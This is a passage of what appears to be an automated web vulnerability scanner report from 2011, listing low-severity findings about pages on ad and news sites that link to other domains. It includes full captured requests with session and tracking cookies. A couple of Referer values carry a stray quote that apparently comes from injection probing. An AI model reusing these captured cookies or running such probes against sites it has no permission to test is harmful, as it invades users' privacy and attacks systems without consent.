-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F', '_blank')">
<img src="http://guru.sitescout.netdna-cdn.com/tv-844d3d3.jpg" alt="SHOCKING: 46" LED TV's for only $98.76!"/>
</td>
...[SNIP]...
-Dqb-G5ehLFlDqZiwTbRSvQV1mlJyVdP_ARS3vHOjjU3Z9ymM3HNPdLFfWpeZuSmRAa7IevnP633WFtNFL5Dr42RLYSBYMO2GJWGkVxixTfjjFXY5-tBTmUBIZS07oayY7RwJB5sCt1ixJxrn4SEIswED1Be08lLz-Al1u11Y0%2F', '_blank')">
<img src="http://guru.sitescout.netdna-cdn.com/52e714ff_12-12_davidson_belly-881bdb1.gif" alt="1 Trick of a Tiny Belly"/>
</td>
...[SNIP]...
23.29. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTcwJnRsPTQzMjAw&piggybackCookie=c1e1301e-3a1f-4ca7-9870-f636b5f10e66&r=http://a.triggit.com/pxpucm HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_22=488-pcv:1|uid:2931142961646634775; KRTBCOOKIE_57=476-uid:2724386019227846218; KRTBCOOKIE_27=1216-uid:4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; KRTBCOOKIE_133=1873-xrd52zkwjuxh; KRTBCOOKIE_53=424-c1e1301e-3a1f-4ca7-9870-f636b5f10e66; PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104

Response

HTTP/1.1 302 Found
Date: Mon, 02 May 2011 01:56:32 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: PUBRETARGET=82_1397691450.78_1397834769.1246_1397970193.1985_1307320077.362_1306098764.1039_1306254899.617_1398451593.70_1306768104; domain=pubmatic.com; expires=Fri, 25-Apr-2014 18:46:33 GMT; path=/
Location: http://a.triggit.com/pxpucm
Content-Length: 317
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>302 Found</title>
</head><body>
<h1>Found</h1>
<p>The document has moved <a href="http://a.triggit.com/pxpucm">here</a>.</p>
<hr>
...[SNIP]...
23.30. http://insurancenewsnet.com/article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://insurancenewsnet.com
Path:   /article.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /article.aspx?id=257992 HTTP/1.1
Host: insurancenewsnet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: public, max-age=600
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=1k3l4a55gy1fk4jf5xabtr45; path=/; HttpOnly
Set-Cookie: INNid=1k3l4a55gy1fk4jf5xabtr45; expires=Tue, 01-May-2012 23:33:25 GMT; path=/
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
Date: Sun, 01 May 2011 23:33:25 GMT
Content-Length: 74743


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
   Insur
...[SNIP]...
<li class="MainNav" id="liNav9"><a id="ctl00_Template_navigation_hlNav9" class="MainLink" href="http://AnnuityNews.com">Annuity</a>
...[SNIP]...
<li class="MainNav" id="liNav7"><a id="ctl00_Template_navigation_hlNav7" class="MainLink" href="http://www.insurancenewsnetmagazine.com" target="_blank">INN Magazine</a>
...[SNIP]...
<div style="width:164px; height:200px; position:relative; z-index:2">
<IFRAME SRC="http://ad.doubleclick.net/adi/N4827.272700.8895614262621/B5117134.4;sz=164x200;ord=[timestamp]?" WIDTH=164 HEIGHT=200 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR='#000000'>
<SCRIPT language='JavaScript1.1' SRC="http://ad.doubleclick.net/adj/N4827.272700.8895614262621/B5117134.4;abr=!ie;sz=164x200;ord=[timestamp]?">
</SCRIPT>
<NOSCRIPT>
<A HREF="http://ad.doubleclick.net/jump/N4827.272700.8895614262621/B5117134.4;abr=!ie4;abr=!ie5;sz=164x200;ord=[timestamp]?">
<IMG SRC="http://ad.doubleclick.net/ad/N4827.272700.8895614262621/B5117134.4;abr=!ie4;abr=!ie5;sz=164x200;ord=[timestamp]?" BORDER=0 WIDTH=164 HEIGHT=200 ALT="Advertisement"></A>
...[SNIP]...
<div style="width:164px; height:200px; position:relative; z-index:3; margin-top:-200px"><a href="http://www.insnewsnet.com/showpage.aspx?id=1919"><img src="http://www.insnewsnet.com/i/transgif.gif" width="164" height="200" border="0" /></a>
...[SNIP]...
<!-- BEGIN FACEBOOK FACEBOOK FACEBOOK -->
                <iframe src="http://www.facebook.com/plugins/likebox.php?href=http%3A%2F%2Fwww.facebook.com%2Finsnewsnet&amp;width=200&amp;connections=6&amp;stream=false&amp;header=false&amp;height=310" scrolling="no" frameborder="0" style="border:none; margin-top:10px; overflow:hidden; width:200px; height:310px;" allowTransparency="true"></iframe>
...[SNIP]...
<div id="ctl00_BodyContent_Repeater1_ctl00_articlediv">
<a href="http://www.thomsonbusinessintelligence.com">

</a>
<a href="http://www.lexisnexis.com">

</a>
...[SNIP]...
<p>eEye Digital Security, a provider of IT security and unified <a href="http://www.eeye.com/Solutions/Business-Need/Vulnerability-Management.aspx?src=prw&amp;371">vulnerability management</a>
...[SNIP]...
ttendees to explore the company's latest innovations, demonstrated in Booth 313, primarily the company...s Retina CS Management solution, Retina Insight reporting engine, as well as add-on modules for <a href="http://www.eeye.com/Solutions/Business-Need/Configuration-Compliance.aspx?src=prw&amp;372">Configuration Compliance</a>
...[SNIP]...
</org> is a <a href="http://www.eeye.com/Products/Retina/Community?src=prw&amp;373">free vulnerability scanner</a> for up to 32 IPs, now being used by nearly four thousand organizations. <a href="http://www.eeye.com/Resources/Security-Center/Research/Zero-Day-Tracker?src=prw&amp;374">Zero Day Tracker</a> provides a catalogue of the newest zero-day vulnerabilities, instructions for quick remediation, and a historical record of past vulnerabilities. <a href="http://www.eeye.com/vef?src=prw&amp;375">eEye...s <org>
...[SNIP]...
<p>Read the full story at <a href="http://www.prweb.com/releases/vulnerability/management/prweb5276794.htm">http://www.prweb.com/releases/vulnerability/management/prweb5276794.htm</a>
...[SNIP]...
<br />
       <iframe src="http://www.facebook.com/plugins/like.php?href=http://insurancenewsnet.com/article.aspx?id=257992&amp;layout=standard&amp;show_faces=true&amp;width=300&amp;action=like&amp;font=arial&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:300px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
</div>
           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js"></script>
...[SNIP]...
</div><script src="http://cdn.js-kit.com/scripts/comments.js"></script>
...[SNIP]...
-size: 11px; color: #FFFFFF;
list-style-image: url(images/newfooterimages/bullet.gif); line-height: 28px;
padding-left: 10px;"><a href="http://annuitynews.com" title="AnnuityNews.com - The official news resource for the annuity industry" style="font-family: Arial, Helvetica, sans-serif;
                                       font-size: 11px; color: #FFFFFF; text-decoration: none;">Annuity News</a>
...[SNIP]...
if; font-size: 11px; color: #FFFFFF;
list-style-image: url(images/newfooterimages/bullet.gif); line-height: 28px;
padding-left: 10px;"><a href="http://insurancenewsnetmagazine.com" alttxt="Insurance Magazine" style="font-family: Arial, Helvetica, sans-serif;
                               font-size: 11px; color: #FFFFFF; text-decoration: none;">INN Magazine</a>
...[SNIP]...
-size: 11px; color: #FFFFFF;
list-style-image: url(images/newfooterimages/bullet.gif); line-height: 28px;
padding-left: 10px;"><a href="http://www.insurancenewsnetmagazine.com/subscribe.htm"
style="font-family: Arial, Helvetica, sans-serif; font-size: 11px; color: #FFFFFF;
text-decoration: none;">Subscription to Magazine</a>
...[SNIP]...
</script>
<script src="http://static.getclicky.com/js" type="text/javascript"></script>
...[SNIP]...
<p><img alt="Clicky" width="1" height="1" src="http://in.getclicky.com/176456ns.gif" /></p>
...[SNIP]...
23.31. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; EVX=eJxLtDK0qs60srS0NLVOhLANrIutDC2slAxNzQ3izeONDEziDUwN443iDZWsa2sBRqkNBg%253D%253D; BFF=eJxLtDK3qi62MjS1Ugo2MjDx9HOuMTB0sLS0NFWyzgQKmxtYA2WNrZR8%252Ff1CPHwi48M8gz1DlKwTrQwNiNBogCyLLGEEl0DXYw6XQTMoxNDAxBek2ggqYQiUMIWKIwmhqDXGIuGHwxA%252FXGoRhtTidTpWV5rgcpIJPifhsh8AGMBniA%253D%253D; TFF=eJyNkD0OwyAMRu%252BSE9gGioCFY2RlYKjUrdki7l6jhghhWjHw%252F57hI3kkf75rvxHoCAajc462kDwfPD0GbsYCD9CmRfCm8mrgKXyXvWdvbc3gPdDrtfOeX%252BnIY219GXqSAutzHjBN3fE44UWGdg8Nnr21NYNHkbqR6sebCOcZ8D8vMqD83T4Da2tG%252BQCHK5kT

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:55:55 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9; expires=Tue, 30-Aug-2011 01:55:56 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:55:56 GMT
Server: HTTP server
Content-Length: 760

document.write('<img src="http://ad.yieldmanager.com/pixel?id=199372&data=218002&id=901810&data=218002&t=2" width="1" height="1"></img><iframe width="0" height="0" frameborder="0" src="http://loadus.e
...[SNIP]...
23.32. http://loadus.exelator.com/load/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/?p=218&g=002&c=153225 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/signup.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxlyz0LwjAUheH%252Fkj2Q3Nx83U7adihoEavgVpo0xYLQodRF%252FO%252FajrodXs7TEdJrJkXsWhUs%252By4gJq3GEIwWBlTUIaEaYieCtlF5KXq%252F%252FqQktox924DAqs43aohFlUAbTNy6EDgOSfMgpOE%252BheSSE2iE%252BuW74rYmsMTyXdmU9d3Oj6Ua1WHSl%252FPUTtO8fx7%252F1KnekicGFlA5I6QHsA4NSMey9wcjUTpn; BFF=eJyllM1ShDAMx9%252BFJ2hLsVAuu%252BJBZqQyLsOsp509eva467tbWqamJQGVa39Jmq9%252FrlqU%252BvapeaGzk2CyNc2d8UNVVUVWf9hnxWpLc511r2Z4fnm%252FjO2pHbL6qmXxC0cGKQQigNRHBZIEGjiT3WQtZsAtKOZ38BTZ5ggwRBBD2UZB5oKPT%252Be54AdPSwEK9hQCEUDqowJJAr115wO3vysBQO7eEcuK8ZKzBBwfhyXI3Tu0DEMc4yFGNXmK1GRB6hOGOEJ7BQIJPOEfDoEEHy28FNix1agNFbVBvOCYBdUST%252BkxF0iezien8%252FQcydPFJPPszdo6Oorl2RtqHXtDfUO3w1H6G7Qdk89aOxzH2jHFjL2%252BVg8LekMkdTAgWByM%252F14H%252BgiQev%252B7vDfUTIt2U5%252B7ZLhDbTtEtUM7tEQ21LBj6Vd2%252Bxv6CtRQ; TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HolH5OVA4iHOP3CM4Ge7N8jZg0zCJkTqMWmtuhsmwWZ4Gg706SXag%252F%252B0a5TuXb4M8D9v0yskDKyPsMxJ%252BUvGeFPG758f8mj5zkyF0wgKuTk9J68sKSOQjB7GvwwEnD6yMsGNofSTbTCdG2gH3%252BcgB8T5cHSxWSvzOCNRIxKlm6nS2ty4vzjy0biXn9vGO1AQVdcyTfsfwHJdyfSknD6yMsHOomk7umFHyH46%252Ft5%252Bvcz%252B5KvcNq14JlUa4N0KmGbLNfGL9Ag4DT6U%253D; EVX=eJyFzksOgCAMRdG9uIL3qiiUxTQOGTs07F1qovGXOGtyCr2z9roWTSmFPOvgM%252FKijNoxTLDJBIMh0MTY5aI8NYorowFiMHGVh%252Fpb8ND%252BQ%252Bnafq4tAoxEy%252BA9432o7sVjW5W%252F1XfxtanWDYvaQKE%253D

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
P3P: policyref=/w3c/p3p.xml, CP=NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA
Content-Type: application/x-javascript
Set-Cookie: TFF=eJyVkzsSgyAURffiCt59onxsXEZaC4vMpEs6x70HEuMHeAYLR2TukXsEB8etm54O7Com1VOD3lrLVTc4dtPdofNXo8nf6Deck3wT8nWU5%252B77uOf0ipURfo7UMWl4Sar03eNtfAyvsRII5DQQ%252BrSU1d4tgUw%252BkVDLQhxxesXKiFBVCcla6MTIO%252BA8nzgg3Yi9g8dKic8hgemJONfMbM5%252BGPJqy8PaWrO0kfUJaQkm6SiTx47xQS7l2lJOr1gZ4edgrnQKx4yyP3H6vY950f0PJ7rHnF6xyyvhohHOjSA0g9jsSMxvAtxP0w%253D%253D; expires=Tue, 30-Aug-2011 01:57:20 GMT; path=/; domain=.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:57:19 GMT; path=/; domain=load.exelator.com
Set-Cookie: EVX=deleted; expires=Sun, 02-May-2010 01:57:19 GMT; path=/; domain=loadus.exelator.com
Set-Cookie: EVX=eJyFzjEOwyAMheG75ATvGShgDmNlZM5YcffaHaomqdTN0mfwv2vS59Teexm75pgxDmXTjaXCqgmyodDEuI2p%252FGiTUDYDxGApVC4ab0FXCU0%252FlKH%252B8%252FIIsBGewXPG%252FdB6Fz98Vf6t3ou%252Fm9Z6AY0CQKQ%253D; expires=Tue, 30-Aug-2011 01:57:20 GMT; path=/; domain=.exelator.com
Date: Mon, 02 May 2011 01:57:20 GMT
Server: HTTP server
Content-Length: 92

document.write('<img src="http://load.s3.amazonaws.com/pixel.gif" width="0" height="0" />');
23.33. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9pYi5hZG54cy5jb20vZ2V0dWlkP2h0dHA6Ly9sb2FkbS5leGVsYXRvci5jb20vbG9hZC8%2FcD0yMDQmZz0wMTEmYmk9JFVJRCZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPg%3D%3D&h=f1ffe0dba83264310d05134a36461417 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/elephant/login.phtml
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJxdi7EKgzAURf%252Fl7YEkLy%252FROFl1EFqH2kI38cVIhUIGsUvpv9d27HK4HO4ZPfrXugOubQ3FvrQH5cgwW5JWYyCOBucwSiYXMFdyyr8%252FpTxsyzT0Wpq2q36p9RAwarImCpcxCzNHEiyVFXnkmMVMGivxPy%252Fr21dp56Eqm77p7m59bO2Cx0SXcxpSWg%252FPExTvD46AL4M%253D; BFF=eJylk01ywjAMhe%252BSE%252FgvNXY20HRBZhqTgUyGrhiWXXcJ3L3GzriKkULbbPVJsmS9d7ZC2cuX5aUtDoKpxtVXxtfGmLKoPn1Ys8pTaYt25%252Frt%252B8dpaA5NX1RnK80vChmkEIgE8hqdSNao50y192wxAu5BOcZBaJIrEeCIJo7KnTQZF968HceFXyJdCbBwpBCIBPIanUjWaN8e19y%252FrgUAMsSRTMP4irMMbF77RyBDHGamIw7TI052ihTZyYO8Jh1xgPkaNBL4wD8cAgUeeqjSQGOzXWuqa41UwTML6ksipc9cInOGGknPGTkyZ%252BhJztm5OTkGis3ZOUqOnUvB26xhUW8qyogqNxc04n9dR5uL9NHfbfPEJbQZnup%252BkbwXqHiBWBdokpLe7Rtuz5BG; TFF=eJyVkz0SgyAQRu%252FiCXYXlB8bj5GWwiIz6ZLO8e6BaEBZcLBwAOc9%252FT5BZ0nY5W2RbEcgJ%252BhxMsZQNzpLdnlaHP3VK%252FAD%252FKcr4%252FvAi4yncVsePRW1NsPfA3kmNe2k4M%252BeH%252FPLfeauYuhCCwxxBii2lonHAs86yP09lHkqam2GH%252FPWkRSVTITlDnjNsw7I9%252BHYwWutxu%252BMoJ4AqJRMp85%252BGniZeDRGKKrt45VpADXLWDfPGfNz3OoNrZ6KWpvh16jvZArHDIr%252FMP%252FeZ%252F5e9%252BTd6r5pbcb6BdYdKVQ%253D; EVX=eJyFjjEOgDAMA%252F%252FSF9iBQpo%252BJmLszIj6d1qQkAoDW6Szc95ssqNYSinm7b6Rd6NaYFzhqwtmR6SLM%252BRifKhKp1QHxOHSqbxo74I3rU0DKtFEHEXfV%252FXatLSo%252FEW%252FmwZrPQGLujlV

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Mon, 02 May 2011 01:57:11 GMT
Server: HTTP server
Content-Length: 147

<HTML><BODY><img src="http://ib.adnxs.com/getuid?http://loadm.exelator.com/load/?p=204&g=011&bi=$UID&j=0" width="1" height="1"></img></BODY></HTML>
23.34. http://loadus.exelator.com/load/net.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://loadus.exelator.com
Path:   /load/net.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /load/net.php?n=PGltZyBzcmM9Imh0dHA6Ly9jbS5nLmRvdWJsZWNsaWNrLm5ldC9waXhlbD9uaWQ9ZXhlbGF0ZSZqPTAiIHdpZHRoPSIxIiBoZWlnaHQ9IjEiPjwvaW1nPjxpbWcgc3JjPSJodHRwOi8vYWRzLmFkYnJpdGUuY29tL2Fkc2VydmVyL2JlaGF2aW9yYWwtZGF0YS84MjAxP2Q9MTAzMSIgd2lkdGg9IjAiIGhlaWdodD0iMCIgYm9yZGVyPSIwIj48L2ltZz48aW1nIHNyYz0iaHR0cDovL3NlZ21lbnQtcGl4ZWwuaW52aXRlbWVkaWEuY29tL3NldF9wYXJ0bmVyX3VpZD9wYXJ0bmVySUQ9NzkmcGFydG5lclVJRD0xNzU0YmI2NTA2MjNjNWJlNDNmY2EwYjU3YzM5MTBkOSZzc2NzX2FjdGl2ZT0xIiB3aWR0aD0iMSIgaGVpZ2h0PSIxIj48L2ltZz4%3D&h=8d858ba9e9afa8b40a627b6ea0e852d0 HTTP/1.1
Host: loadus.exelator.com
Proxy-Connection: keep-alive
Referer: http://www.japanator.com/favicon.ico'
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: xltl=eJwdy6sOwzAMQNF%252FMY%252FkxI8kLlxJyUg1PNWpKw1PQ1P%252FfQ92wbmbFXs%252FjQxuywzTt4pBrsLuKqiFhngwHWNDlzqoZ9z7z%252BVs8Hrs97UgL9fLf1WDQVFEOVJt7omPkOSYNfXwaNGQFQmm8wNVyR9D; BFF=eJylks0OgjAQhN%252BFJ%252BgflpYLigdJpCbSEDwZjp49qu9uBVKX0oI%252F1%252F12pt3MtBIn8naVOJZRRRArVH5HOBNCxFF6MWOOUkOpjMqD0rv96VwXVaGjtJVEfCBEkEJALHA13BLHSGPEytc2GQA2IB7mYDTapR6gAiYqtDsyGQ5eb5vh4FVPEwIO7ikExAJXwy1xjI5lk2HzOicA0G7u2RQIJxg5YL3RU0C7Ody0IdbjEEc39dRzkwGuxoZYw30OjIj%252Fw28OAQMPTVQcdGzWNQ%252B55q7qMdtQbxlZqHlsrnm%252F1izcpmBxvu%252FJQi3C6S8G%252FVeeM7E9AdjlJeY%253D; TFF=eJyNkj0OgzAMRu%252FCCWyTkNgsHKMrA0Olbu2GuHtNy28SkAeUEL2XfB%252BkF2QZ34IkFYHrwGPHzFS1vZCMT8FWHx9AB1inU8b7ma8Tntr%252F69ELm2YzdA2cfe%252FhMbz6z5DsHWkxfKEFznEaKLZ2O48FPuvglnMo8cKm2Qwds9YrWV9kIix3wHs%252B64D51z12UM1q%252FO4Ixg6ASsni3lmnM%252B92HpnrQFf%252FEW9MBoxZxmvznDG9x1avsXph02yGrmE0kdMXsnf1Bw%253D%253D; EVX=eJyNjLENgDAMBHfJBP%252BGENsZxkqZmhJld5IGCYmC7qQ7XfPNr%252B5mlmtzWYx6OtUTc0GUEOyBzJBgqt35WJVlqQFIYNkxR6ASc8X36js2O36l4wb%252Bpiq9

Response

HTTP/1.1 200 OK
Connection: close
X-Powered-By: PHP/5.2.8
Content-Type: text/html
Date: Mon, 02 May 2011 01:55:58 GMT
Server: HTTP server
Content-Length: 385

<HTML><BODY><img src="http://cm.g.doubleclick.net/pixel?nid=exelate&j=0" width="1" height="1"></img><img src="http://ads.adbrite.com/adserver/behavioral-data/8201?d=1031" width="0" height="0" border="0"></img><img src="http://segment-pixel.invitemedia.com/set_partner_uid?partnerID=79&partnerUID=1754bb650623c5be43fca0b57c3910d9&sscs_active=1" width="1" height="1"></img>
...[SNIP]...
23.35. http://media.washingtonpost.com/wp-srv/ad/wp_ad.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://media.washingtonpost.com
Path:   /wp-srv/ad/wp_ad.js

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /wp-srv/ad/wp_ad.js?version=172 HTTP/1.1
Host: media.washingtonpost.com
Proxy-Connection: keep-alive
Referer: http://www.washingtonpost.com/wl/jobs/home?wpsrc=AG0002174&keyword=4846831919&cre=430450907&g=1&s_kwcid=TC-21380-4846831919-e-430450907
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WashingtonJobsSession=6zZRN9tGhpCv84LpLYbzSQp9QL2pZ6KRM7JFwNxyFRtwB9bjzDTH!1853811560; WPNIUCID=WPNI1304310786188.9974; mbox=check#true#1304310850|session#1304310789089-468386#1304312650

Response

HTTP/1.1 200 OK
Server: Web Server
Content-Type: application/x-javascript
Last-Modified: Fri, 29 Apr 2011 02:09:13 GMT
ETag: "6f64-4dba1dc9"
Vary: Accept-Encoding
Cache-Control: max-age=86400
Expires: Mon, 02 May 2011 23:33:21 GMT
Date: Sun, 01 May 2011 23:33:21 GMT
Connection: close
Content-Length: 28516

wpniSite = 'wpni';
wpniDomain = 'washingtonpost.com';
show_doubleclick_ad = true;
rssString = "fromrss=y";
tileThatGetsDcopt = 1;
hourScope = 24;
numPop = 5;
//this declares what kinds of ads a
...[SNIP]...
<img src="http://media.washingtonpost.com/wp-adv/advertisers/target/images/target_tile_30x90.gif" onclick="wpniAds.target.exec()" id="target-tile" alt="Target" border="0" width="90" height="29"/><img src="http://ad.doubleclick.net/ad/N3550.WashingtonPost/B5040651.3;sz=1x1;ord='+ Math.floor(Math.random()*1E3)+'?" border="0" width="1" height="1" alt="" style="display:none" />'
}

wpniAds.target = {
   exec:function(){
       var b=$("#main-nav-wrapper").next(),a=document.createElement("link");
       $(a).attr({href:"http://media.washingtonpost.com/wp-adv/advertisers/target/eido
...[SNIP]...
</object><img src="http://ad.doubleclick.net/ad/N3550.WashingtonPost/B5040651.2;sz=1x1;ord='+ Math.floor(Math.random()*1E3)+'?" border="0" width="1" height="1" alt="" style="display:none" />')},
   close:function(){
       $("div#target").remove();
       $("div#shell").removeClass("target")
   }
};

//15654-JH
wpniAds.templates.initRule('market_minute');
wpniAds.templates.rules.market_minute
...[SNIP]...
<div style="width:156px;padding:0;margin:0;"><a href="http://ad.doubleclick.net/clk;236932920;29926764;u?http://www.longandfoster.com/Market-Minutes/MarketMinutesReports.aspx" target="_blank" style="text-decoration:none;border:0;color:#464646;"><img src="http://media.washingtonpost.com/wp-adv/advertisers/longfoster/2011/tile/market_minute_logo.png" border="0" height="37" width="156" alt="" />
...[SNIP]...
23.36. http://online.wsj.com/internal/ModTwitWSJMarkets.htm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://online.wsj.com
